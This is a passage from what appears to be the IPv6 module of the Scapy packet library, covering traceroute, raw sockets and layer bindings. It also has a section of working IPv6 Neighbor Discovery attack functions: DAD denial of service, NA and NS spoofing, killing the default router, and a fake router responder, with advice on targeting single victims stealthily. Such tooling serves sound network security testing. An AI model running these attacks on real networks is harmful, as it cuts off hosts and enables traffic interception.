3400 _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr) 

3401 

3402 if asn.startswith("AS"): 

3403 try: 

3404 asn = int(asn[2:]) 

3405 except ValueError: 

3406 pass 

3407 

3408 return ip, asn, desc 

3409 

3410 

3411class TracerouteResult6(TracerouteResult): 

3412 __slots__ = [] 

3413 

3414 def show(self): 

3415 return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! # noqa: E501 

3416 s.hlim, 

3417 r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" + # noqa: E501 

3418 "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" + # noqa: E501 

3419 "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" + # noqa: E501 

3420 "{ICMPv6EchoReply:%ir,type%}"))) # noqa: E501 

3421 

3422 def get_trace(self): 

3423 trace = {} 

3424 

3425 for s, r in self.res: 

3426 if IPv6 not in s: 

3427 continue 

3428 d = s[IPv6].dst 

3429 if d not in trace: 

3430 trace[d] = {} 

3431 

3432 t = not (ICMPv6TimeExceeded in r or 

3433 ICMPv6DestUnreach in r or 

3434 ICMPv6PacketTooBig in r or 

3435 ICMPv6ParamProblem in r) 

3436 

3437 trace[d][s[IPv6].hlim] = r[IPv6].src, t 

3438 

3439 for k in trace.values(): 

3440 try: 

3441 m = min(x for x, y in k.items() if y[1]) 

3442 except ValueError: 

3443 continue 

3444 for li in list(k): # use list(): k is modified in the loop 

3445 if li > m: 

3446 del k[li] 

3447 

3448 return trace 

3449 

3450 def graph(self, ASres=AS_resolver6(), **kargs): 

3451 TracerouteResult.graph(self, ASres=ASres, **kargs) 

3452 

3453 

3454@conf.commands.register 

3455def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(), 

3456 l4=None, timeout=2, verbose=None, **kargs): 

3457 """Instant TCP traceroute using IPv6 

3458 traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None 

3459 """ 

3460 if verbose is None: 

3461 verbose = conf.verb 

3462 

3463 if l4 is None: 

3464 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport), # noqa: E501 

3465 timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) # noqa: E501 

3466 else: 

3467 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4, 

3468 timeout=timeout, verbose=verbose, **kargs) 

3469 

3470 a = TracerouteResult6(a.res) 

3471 

3472 if verbose: 

3473 a.show() 

3474 

3475 return a, b 

3476 

3477############################################################################# 

3478############################################################################# 

3479# Sockets # 

3480############################################################################# 

3481############################################################################# 

3482 

3483 

3484if not WINDOWS: 

3485 from scapy.supersocket import L3RawSocket 

3486 

3487 class L3RawSocket6(L3RawSocket): 

3488 def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501 

3489 # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501 

3490 self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 

3491 self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 

3492 self.iface = iface 

3493 

3494 

3495def IPv6inIP(dst='203.178.135.36', src=None): 

3496 _IPv6inIP.dst = dst 

3497 _IPv6inIP.src = src 

3498 if not conf.L3socket == _IPv6inIP: 

3499 _IPv6inIP.cls = conf.L3socket 

3500 else: 

3501 del conf.L3socket 

3502 return _IPv6inIP 

3503 

3504 

3505class _IPv6inIP(SuperSocket): 

3506 dst = '127.0.0.1' 

3507 src = None 

3508 cls = None 

3509 

3510 def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): # noqa: E501 

3511 SuperSocket.__init__(self, family, type, proto) 

3512 self.worker = self.cls(**args) 

3513 

3514 def set(self, dst, src=None): 

3515 _IPv6inIP.src = src 

3516 _IPv6inIP.dst = dst 

3517 

3518 def nonblock_recv(self): 

3519 p = self.worker.nonblock_recv() 

3520 return self._recv(p) 

3521 

3522 def recv(self, x): 

3523 p = self.worker.recv(x) 

3524 return self._recv(p, x) 

3525 

3526 def _recv(self, p, x=MTU): 

3527 if p is None: 

3528 return p 

3529 elif isinstance(p, IP): 

3530 # TODO: verify checksum 

3531 if p.src == self.dst and p.proto == socket.IPPROTO_IPV6: 

3532 if isinstance(p.payload, IPv6): 

3533 return p.payload 

3534 return p 

3535 

3536 def send(self, x): 

3537 return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x) # noqa: E501 

3538 

3539 

3540############################################################################# 

3541############################################################################# 

3542# Neighbor Discovery Protocol Attacks # 

3543############################################################################# 

3544############################################################################# 

3545 

3546def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None, 

3547 tgt_filter=None, reply_mac=None): 

3548 """ 

3549 Internal generic helper accepting a specific callback as first argument, 

3550 for NS or NA reply. See the two specific functions below. 

3551 """ 

3552 

3553 def is_request(req, mac_src_filter, tgt_filter): 

3554 """ 

3555 Check if packet req is a request 

3556 """ 

3557 

3558 # Those simple checks are based on Section 5.4.2 of RFC 4862 

3559 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): 

3560 return 0 

3561 

3562 # Get and compare the MAC address 

3563 mac_src = req[Ether].src 

3564 if mac_src_filter and mac_src != mac_src_filter: 

3565 return 0 

3566 

3567 # Source must be the unspecified address 

3568 if req[IPv6].src != "::": 

3569 return 0 

3570 

3571 # Check destination is the link-local solicited-node multicast 

3572 # address associated with target address in received NS 

3573 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) 

3574 if tgt_filter and tgt != tgt_filter: 

3575 return 0 

3576 received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst) 

3577 expected_snma = in6_getnsma(tgt) 

3578 if received_snma != expected_snma: 

3579 return 0 

3580 

3581 return 1 

3582 

3583 if not iface: 

3584 iface = conf.iface 

3585 

3586 # To prevent sniffing our own traffic 

3587 if not reply_mac: 

3588 reply_mac = get_if_hwaddr(iface) 

3589 sniff_filter = "icmp6 and not ether src %s" % reply_mac 

3590 

3591 sniff(store=0, 

3592 filter=sniff_filter, 

3593 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), 

3594 prn=lambda x: reply_callback(x, reply_mac, iface), 

3595 iface=iface) 

3596 

3597 

3598def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None, 

3599 reply_mac=None): 

3600 """ 

3601 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 

3602 3756. This is done by listening incoming NS messages sent from the 

3603 unspecified address and sending a NS reply for the target address, 

3604 leading the peer to believe that another node is also performing DAD 

3605 for that address. 

3606 

3607 By default, the fake NS sent to create the DoS uses: 

3608 - as target address the target address found in received NS. 

3609 - as IPv6 source address: the unspecified address (::). 

3610 - as IPv6 destination address: the link-local solicited-node multicast 

3611 address derived from the target address in received NS. 

3612 - the mac address of the interface as source (or reply_mac, see below). 

3613 - the multicast mac address derived from the solicited node multicast 

3614 address used as IPv6 destination address. 

3615 

3616 Following arguments can be used to change the behavior: 

3617 

3618 iface: a specific interface (e.g. "eth0") of the system on which the 

3619 DoS should be launched. If None is provided conf.iface is used. 

3620 

3621 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

3622 Only NS messages received from this source will trigger replies. 

3623 This allows limiting the effects of the DoS to a single target by 

3624 filtering on its mac address. The default value is None: the DoS 

3625 is not limited to a specific mac address. 

3626 

3627 tgt_filter: Same as previous but for a specific target IPv6 address for 

3628 received NS. If the target address in the NS message (not the IPv6 

3629 destination address) matches that address, then a fake reply will 

3630 be sent, i.e. the emitter will be a target of the DoS. 

3631 

3632 reply_mac: allow specifying a specific source mac address for the reply, 

3633 i.e. to prevent the use of the mac address of the interface. 

3634 """ 

3635 

3636 def ns_reply_callback(req, reply_mac, iface): 

3637 """ 

3638 Callback that reply to a NS by sending a similar NS 

3639 """ 

3640 

3641 # Let's build a reply and send it 

3642 mac = req[Ether].src 

3643 dst = req[IPv6].dst 

3644 tgt = req[ICMPv6ND_NS].tgt 

3645 rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt) # noqa: E501 

3646 sendp(rep, iface=iface, verbose=0) 

3647 

3648 print("Reply NS for target address %s (received from %s)" % (tgt, mac)) 

3649 

3650 _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter, 

3651 tgt_filter, reply_mac) 

3652 

3653 

3654def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None, 

3655 reply_mac=None): 

3656 """ 

3657 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 

3658 3756. This is done by listening incoming NS messages *sent from the 

3659 unspecified address* and sending a NA reply for the target address, 

3660 leading the peer to believe that another node is also performing DAD 

3661 for that address. 

3662 

3663 By default, the fake NA sent to create the DoS uses: 

3664 - as target address the target address found in received NS. 

3665 - as IPv6 source address: the target address found in received NS. 

3666 - as IPv6 destination address: the link-local solicited-node multicast 

3667 address derived from the target address in received NS. 

3668 - the mac address of the interface as source (or reply_mac, see below). 

3669 - the multicast mac address derived from the solicited node multicast 

3670 address used as IPv6 destination address. 

3671 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled 

3672 with the mac address used as source of the NA. 

3673 

3674 Following arguments can be used to change the behavior: 

3675 

3676 iface: a specific interface (e.g. "eth0") of the system on which the 

3677 DoS should be launched. If None is provided conf.iface is used. 

3678 

3679 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

3680 Only NS messages received from this source will trigger replies. 

3681 This allows limiting the effects of the DoS to a single target by 

3682 filtering on its mac address. The default value is None: the DoS 

3683 is not limited to a specific mac address. 

3684 

3685 tgt_filter: Same as previous but for a specific target IPv6 address for 

3686 received NS. If the target address in the NS message (not the IPv6 

3687 destination address) matches that address, then a fake reply will 

3688 be sent, i.e. the emitter will be a target of the DoS. 

3689 

3690 reply_mac: allow specifying a specific source mac address for the reply, 

3691 i.e. to prevent the use of the mac address of the interface. This 

3692 address will also be used in the Target Link-Layer Address option. 

3693 """ 

3694 

3695 def na_reply_callback(req, reply_mac, iface): 

3696 """ 

3697 Callback that reply to a NS with a NA 

3698 """ 

3699 

3700 # Let's build a reply and send it 

3701 mac = req[Ether].src 

3702 dst = req[IPv6].dst 

3703 tgt = req[ICMPv6ND_NS].tgt 

3704 rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst) 

3705 rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) # noqa: E741 

3706 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) 

3707 sendp(rep, iface=iface, verbose=0) 

3708 

3709 print("Reply NA for target address %s (received from %s)" % (tgt, mac)) 

3710 

3711 _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter, 

3712 tgt_filter, reply_mac) 

3713 

3714 

3715def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None, 

3716 reply_mac=None, router=False): 

3717 """ 

3718 The main purpose of this function is to send fake Neighbor Advertisement 

3719 messages to a victim. As the emission of unsolicited Neighbor Advertisement 

3720 is pretty pointless (from an attacker standpoint) because it will not 

3721 lead to a modification of a victim's neighbor cache, the function send 

3722 advertisements in response to received NS (NS sent as part of the DAD, 

3723 i.e. with an unspecified address as source, are not considered). 

3724 

3725 By default, the fake NA sent to create the DoS uses: 

3726 - as target address the target address found in received NS. 

3727 - as IPv6 source address: the target address 

3728 - as IPv6 destination address: the source IPv6 address of received NS 

3729 message. 

3730 - the mac address of the interface as source (or reply_mac, see below). 

3731 - the source mac address of the received NS as destination macs address 

3732 of the emitted NA. 

3733 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) 

3734 filled with the mac address used as source of the NA. 

3735 

3736 Following arguments can be used to change the behavior: 

3737 

3738 iface: a specific interface (e.g. "eth0") of the system on which the 

3739 DoS should be launched. If None is provided conf.iface is used. 

3740 

3741 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

3742 Only NS messages received from this source will trigger replies. 

3743 This allows limiting the effects of the DoS to a single target by 

3744 filtering on its mac address. The default value is None: the DoS 

3745 is not limited to a specific mac address. 

3746 

3747 tgt_filter: Same as previous but for a specific target IPv6 address for 

3748 received NS. If the target address in the NS message (not the IPv6 

3749 destination address) matches that address, then a fake reply will 

3750 be sent, i.e. the emitter will be a target of the DoS. 

3751 

3752 reply_mac: allow specifying a specific source mac address for the reply, 

3753 i.e. to prevent the use of the mac address of the interface. This 

3754 address will also be used in the Target Link-Layer Address option. 

3755 

3756 router: by the default (False) the 'R' flag in the NA used for the reply 

3757 is not set. If the parameter is set to True, the 'R' flag in the 

3758 NA is set, advertising us as a router. 

3759 

3760 Please, keep the following in mind when using the function: for obvious 

3761 reasons (kernel space vs. Python speed), when the target of the address 

3762 resolution is on the link, the sender of the NS receives 2 NA messages 

3763 in a row, the valid one and our fake one. The second one will overwrite 

3764 the information provided by the first one, i.e. the natural latency of 

3765 Scapy helps here. 

3766 

3767 In practice, on a common Ethernet link, the emission of the NA from the 

3768 genuine target (kernel stack) usually occurs in the same millisecond as 

3769 the receipt of the NS. The NA generated by Scapy6 will usually come after 

3770 something 20+ ms. On a usual testbed for instance, this difference is 

3771 sufficient to have the first data packet sent from the victim to the 

3772 destination before it even receives our fake NA. 

3773 """ 

3774 

3775 def is_request(req, mac_src_filter, tgt_filter): 

3776 """ 

3777 Check if packet req is a request 

3778 """ 

3779 

3780 # Those simple checks are based on Section 5.4.2 of RFC 4862 

3781 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): 

3782 return 0 

3783 

3784 mac_src = req[Ether].src 

3785 if mac_src_filter and mac_src != mac_src_filter: 

3786 return 0 

3787 

3788 # Source must NOT be the unspecified address 

3789 if req[IPv6].src == "::": 

3790 return 0 

3791 

3792 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) 

3793 if tgt_filter and tgt != tgt_filter: 

3794 return 0 

3795 

3796 dst = req[IPv6].dst 

3797 if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast. 

3798 

3799 # If this is a real address resolution NS, then the destination 

3800 # address of the packet is the link-local solicited node multicast 

3801 # address associated with the target of the NS. 

3802 # Otherwise, the NS is a NUD related one, i.e. the peer is 

3803 # unicasting the NS to check the target is still alive (L2 

3804 # information is still in its cache and it is verified) 

3805 received_snma = inet_pton(socket.AF_INET6, dst) 

3806 expected_snma = in6_getnsma(tgt) 

3807 if received_snma != expected_snma: 

3808 print("solicited node multicast @ does not match target @!") 

3809 return 0 

3810 

3811 return 1 

3812 

3813 def reply_callback(req, reply_mac, router, iface): 

3814 """ 

3815 Callback that reply to a NS with a spoofed NA 

3816 """ 

3817 

3818 # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and 

3819 # send it back. 

3820 mac = req[Ether].src 

3821 pkt = req[IPv6] 

3822 src = pkt.src 

3823 tgt = req[ICMPv6ND_NS].tgt 

3824 rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src) 

3825 # Use the target field from the NS 

3826 rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741 

3827 

3828 # "If the solicitation IP Destination Address is not a multicast 

3829 # address, the Target Link-Layer Address option MAY be omitted" 

3830 # Given our purpose, we always include it. 

3831 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) 

3832 

3833 sendp(rep, iface=iface, verbose=0) 

3834 

3835 print("Reply NA for target address %s (received from %s)" % (tgt, mac)) 

3836 

3837 if not iface: 

3838 iface = conf.iface 

3839 # To prevent sniffing our own traffic 

3840 if not reply_mac: 

3841 reply_mac = get_if_hwaddr(iface) 

3842 sniff_filter = "icmp6 and not ether src %s" % reply_mac 

3843 

3844 router = 1 if router else 0 # Value of the R flags in NA 

3845 

3846 sniff(store=0, 

3847 filter=sniff_filter, 

3848 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), 

3849 prn=lambda x: reply_callback(x, reply_mac, router, iface), 

3850 iface=iface) 

3851 

3852 

3853def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1", 

3854 dst=None, src_mac=None, dst_mac=None, loop=True, 

3855 inter=1, iface=None): 

3856 """ 

3857 The main purpose of this function is to send fake Neighbor Solicitations 

3858 messages to a victim, in order to either create a new entry in its neighbor 

3859 cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated 

3860 that a node SHOULD create the entry or update an existing one (if it is not 

3861 currently performing DAD for the target of the NS). The entry's reachability # noqa: E501 

3862 state is set to STALE. 

3863 

3864 The two main parameters of the function are the source link-layer address 

3865 (carried by the Source Link-Layer Address option in the NS) and the 

3866 source address of the packet. 

3867 

3868 Unlike some other NDP_Attack_* function, this one is not based on a 

3869 stimulus/response model. When called, it sends the same NS packet in loop 

3870 every second (the default) 

3871 

3872 Following arguments can be used to change the format of the packets: 

3873 

3874 src_lladdr: the MAC address used in the Source Link-Layer Address option 

3875 included in the NS packet. This is the address that the peer should 

3876 associate in its neighbor cache with the IPv6 source address of the 

3877 packet. If None is provided, the mac address of the interface is 

3878 used. 

3879 

3880 src: the IPv6 address used as source of the packet. If None is provided, 

3881 an address associated with the emitting interface will be used 

3882 (based on the destination address of the packet). 

3883 

3884 target: the target address of the NS packet. If no value is provided, 

3885 a dummy address (2001:db8::1) is used. The value of the target 

3886 has a direct impact on the destination address of the packet if it 

3887 is not overridden. By default, the solicited-node multicast address 

3888 associated with the target is used as destination address of the 

3889 packet. Consider specifying a specific destination address if you 

3890 intend to use a target address different than the one of the victim. 

3891 

3892 dst: The destination address of the NS. By default, the solicited node 

3893 multicast address associated with the target address (see previous 

3894 parameter) is used if no specific value is provided. The victim 

3895 is not expected to check the destination address of the packet, 

3896 so using a multicast address like ff02::1 should work if you want 

3897 the attack to target all hosts on the link. On the contrary, if 

3898 you want to be more stealth, you should provide the target address 

3899 for this parameter in order for the packet to be sent only to the 

3900 victim. 

3901 

3902 src_mac: the MAC address used as source of the packet. By default, this 

3903 is the address of the interface. If you want to be more stealth, 

3904 feel free to use something else. Note that this address is not the 

3905 that the victim will use to populate its neighbor cache. 

3906 

3907 dst_mac: The MAC address used as destination address of the packet. If 

3908 the IPv6 destination address is multicast (all-nodes, solicited 

3909 node, ...), it will be computed. If the destination address is 

3910 unicast, a neighbor solicitation will be performed to get the 

3911 associated address. If you want the attack to be stealth, you 

3912 can provide the MAC address using this parameter. 

3913 

3914 loop: By default, this parameter is True, indicating that NS packets 

3915 will be sent in loop, separated by 'inter' seconds (see below). 

3916 When set to False, a single packet is sent. 

3917 

3918 inter: When loop parameter is True (the default), this parameter provides 

3919 the interval in seconds used for sending NS packets. 

3920 

3921 iface: to force the sending interface. 

3922 """ 

3923 

3924 if not iface: 

3925 iface = conf.iface 

3926 

3927 # Use provided MAC address as source link-layer address option 

3928 # or the MAC address of the interface if none is provided. 

3929 if not src_lladdr: 

3930 src_lladdr = get_if_hwaddr(iface) 

3931 

3932 # Prepare packets parameters 

3933 ether_params = {} 

3934 if src_mac: 

3935 ether_params["src"] = src_mac 

3936 

3937 if dst_mac: 

3938 ether_params["dst"] = dst_mac 

3939 

3940 ipv6_params = {} 

3941 if src: 

3942 ipv6_params["src"] = src 

3943 if dst: 

3944 ipv6_params["dst"] = dst 

3945 else: 

3946 # Compute the solicited-node multicast address 

3947 # associated with the target address. 

3948 tmp = inet_ntop(socket.AF_INET6, 

3949 in6_getnsma(inet_pton(socket.AF_INET6, target))) 

3950 ipv6_params["dst"] = tmp 

3951 

3952 pkt = Ether(**ether_params) 

3953 pkt /= IPv6(**ipv6_params) 

3954 pkt /= ICMPv6ND_NS(tgt=target) 

3955 pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr) 

3956 

3957 sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0) 

3958 

3959 

3960def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None, 

3961 ip_src_filter=None, reply_mac=None, 

3962 tgt_mac=None): 

3963 """ 

3964 The purpose of the function is to monitor incoming RA messages 

3965 sent by default routers (RA with a non-zero Router Lifetime values) 

3966 and invalidate them by immediately replying with fake RA messages 

3967 advertising a zero Router Lifetime value. 

3968 

3969 The result on receivers is that the router is immediately invalidated, 

3970 i.e. the associated entry is discarded from the default router list 

3971 and destination cache is updated to reflect the change. 

3972 

3973 By default, the function considers all RA messages with a non-zero 

3974 Router Lifetime value but provides configuration knobs to allow 

3975 filtering RA sent by specific routers (Ethernet source address). 

3976 With regard to emission, the multicast all-nodes address is used 

3977 by default but a specific target can be used, in order for the DoS to 

3978 apply only to a specific host. 

3979 

3980 More precisely, following arguments can be used to change the behavior: 

3981 

3982 iface: a specific interface (e.g. "eth0") of the system on which the 

3983 DoS should be launched. If None is provided conf.iface is used. 

3984 

3985 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

3986 Only RA messages received from this source will trigger replies. 

3987 If other default routers advertised their presence on the link, 

3988 their clients will not be impacted by the attack. The default 

3989 value is None: the DoS is not limited to a specific mac address. 

3990 

3991 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter 

3992 on. Only RA messages received from this source address will trigger 

3993 replies. If other default routers advertised their presence on the 

3994 link, their clients will not be impacted by the attack. The default 

3995 value is None: the DoS is not limited to a specific IPv6 source 

3996 address. 

3997 

3998 reply_mac: allow specifying a specific source mac address for the reply, 

3999 i.e. to prevent the use of the mac address of the interface. 

4000 

4001 tgt_mac: allow limiting the effect of the DoS to a specific host, 

4002 by sending the "invalidating RA" only to its mac address. 

4003 """ 

4004 

4005 def is_request(req, mac_src_filter, ip_src_filter): 

4006 """ 

4007 Check if packet req is a request 

4008 """ 

4009 

4010 if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req): 

4011 return 0 

4012 

4013 mac_src = req[Ether].src 

4014 if mac_src_filter and mac_src != mac_src_filter: 

4015 return 0 

4016 

4017 ip_src = req[IPv6].src 

4018 if ip_src_filter and ip_src != ip_src_filter: 

4019 return 0 

4020 

4021 # Check if this is an advertisement for a Default Router 

4022 # by looking at Router Lifetime value 

4023 if req[ICMPv6ND_RA].routerlifetime == 0: 

4024 return 0 

4025 

4026 return 1 

4027 

4028 def ra_reply_callback(req, reply_mac, tgt_mac, iface): 

4029 """ 

4030 Callback that sends an RA with a 0 lifetime 

4031 """ 

4032 

4033 # Let's build a reply and send it 

4034 

4035 src = req[IPv6].src 

4036 

4037 # Prepare packets parameters 

4038 ether_params = {} 

4039 if reply_mac: 

4040 ether_params["src"] = reply_mac 

4041 

4042 if tgt_mac: 

4043 ether_params["dst"] = tgt_mac 

4044 

4045 # Basis of fake RA (high pref, zero lifetime) 

4046 rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1") 

4047 rep /= ICMPv6ND_RA(prf=1, routerlifetime=0) 

4048 

4049 # Add it a PIO from the request ... 

4050 tmp = req 

4051 while ICMPv6NDOptPrefixInfo in tmp: 

4052 pio = tmp[ICMPv6NDOptPrefixInfo] 

4053 tmp = pio.payload 

4054 del pio.payload 

4055 rep /= pio 

4056 

4057 # ... and source link layer address option 

4058 if ICMPv6NDOptSrcLLAddr in req: 

4059 mac = req[ICMPv6NDOptSrcLLAddr].lladdr 

4060 else: 

4061 mac = req[Ether].src 

4062 rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac) 

4063 

4064 sendp(rep, iface=iface, verbose=0) 

4065 

4066 print("Fake RA sent with source address %s" % src) 

4067 

4068 if not iface: 

4069 iface = conf.iface 

4070 # To prevent sniffing our own traffic 

4071 if not reply_mac: 

4072 reply_mac = get_if_hwaddr(iface) 

4073 sniff_filter = "icmp6 and not ether src %s" % reply_mac 

4074 

4075 sniff(store=0, 

4076 filter=sniff_filter, 

4077 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), 

4078 prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface), 

4079 iface=iface) 

4080 

4081 

4082def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None, 

4083 ip_src_filter=None): 

4084 """ 

4085 The purpose of this function is to send provided RA message at layer 2 

4086 (i.e. providing a packet starting with IPv6 will not work) in response 

4087 to received RS messages. In the end, the function is a simple wrapper 

4088 around sendp() that monitor the link for RS messages. 

4089 

4090 It is probably better explained with an example: 

4091 

4092 >>> ra = Ether()/IPv6()/ICMPv6ND_RA() 

4093 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64) 

4094 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64) 

4095 >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55") 

4096 >>> NDP_Attack_Fake_Router(ra, iface="eth0") 

4097 Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573 

4098 Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae 

4099 ... 

4100 

4101 Following arguments can be used to change the behavior: 

4102 

4103 ra: the RA message to send in response to received RS message. 

4104 

4105 iface: a specific interface (e.g. "eth0") of the system on which the 

4106 DoS should be launched. If none is provided, conf.iface is 

4107 used. 

4108 

4109 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

4110 Only RS messages received from this source will trigger a reply. 

4111 Note that no changes to provided RA is done which imply that if 

4112 you intend to target only the source of the RS using this option, 

4113 you will have to set the Ethernet destination address to the same 

4114 value in your RA. 

4115 The default value for this parameter is None: no filtering on the 

4116 source of RS is done. 

4117 

4118 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter 

4119 on. Only RS messages received from this source address will trigger 

4120 replies. Same comment as for previous argument apply: if you use 

4121 the option, you will probably want to set a specific Ethernet 

4122 destination address in the RA. 

4123 """ 

4124 

4125 def is_request(req, mac_src_filter, ip_src_filter): 

4126 """ 

4127 Check if packet req is a request 

4128 """ 

4129 

4130 if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req): 

4131 return 0 

4132 

4133 mac_src = req[Ether].src 

4134 if mac_src_filter and mac_src != mac_src_filter: 

4135 return 0 

4136 

4137 ip_src = req[IPv6].src 

4138 if ip_src_filter and ip_src != ip_src_filter: 

4139 return 0 

4140 

4141 return 1 

4142 

4143 def ra_reply_callback(req, iface): 

4144 """ 

4145 Callback that sends an RA in reply to an RS 

4146 """ 

4147 

4148 src = req[IPv6].src 

4149 sendp(ra, iface=iface, verbose=0) 

4150 print("Fake RA sent in response to RS from %s" % src) 

4151 

4152 if not iface: 

4153 iface = conf.iface 

4154 sniff_filter = "icmp6" 

4155 

4156 sniff(store=0, 

4157 filter=sniff_filter, 

4158 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), 

4159 prn=lambda x: ra_reply_callback(x, iface), 

4160 iface=iface) 

4161 

4162############################################################################# 

4163# Pre-load classes ## 

4164############################################################################# 

4165 

4166 

4167def _get_cls(name): 

4168 return globals().get(name, Raw) 

4169 

4170 

4171def _load_dict(d): 

4172 for k, v in d.items(): 

4173 d[k] = _get_cls(v) 

4174 

4175 

4176_load_dict(icmp6ndoptscls) 

4177_load_dict(icmp6typescls) 

4178_load_dict(ipv6nhcls) 

4179 

4180############################################################################# 

4181############################################################################# 

4182# Layers binding # 

4183############################################################################# 

4184############################################################################# 

4185 

4186conf.l3types.register(ETH_P_IPV6, IPv6) 

4187conf.l3types.register_num2layer(ETH_P_ALL, IPv46) 

4188conf.l2types.register(31, IPv6) 

4189conf.l2types.register(DLT_IPV6, IPv6) 

4190conf.l2types.register(DLT_RAW, IPv46) 

4191conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46) 

4192 

4193bind_layers(Ether, IPv6, type=0x86dd) 

4194bind_layers(CookedLinux, IPv6, proto=0x86dd) 

4195bind_layers(GRE, IPv6, proto=0x86dd) 

4196bind_layers(SNAP, IPv6, code=0x86dd) 

4197# AF_INET6 values are platform-dependent. For a detailed explaination, read 

4198# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354 # noqa: E501 

4199if WINDOWS: 

4200 bind_layers(Loopback, IPv6, type=0x18) 

4201else: 

4202 bind_layers(Loopback, IPv6, type=socket.AF_INET6) 

4203bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP) 

4204bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP) 

4205bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP) 

4206bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP) 

4207bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6) 

4208bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6) 

4209bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP) 

4210bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)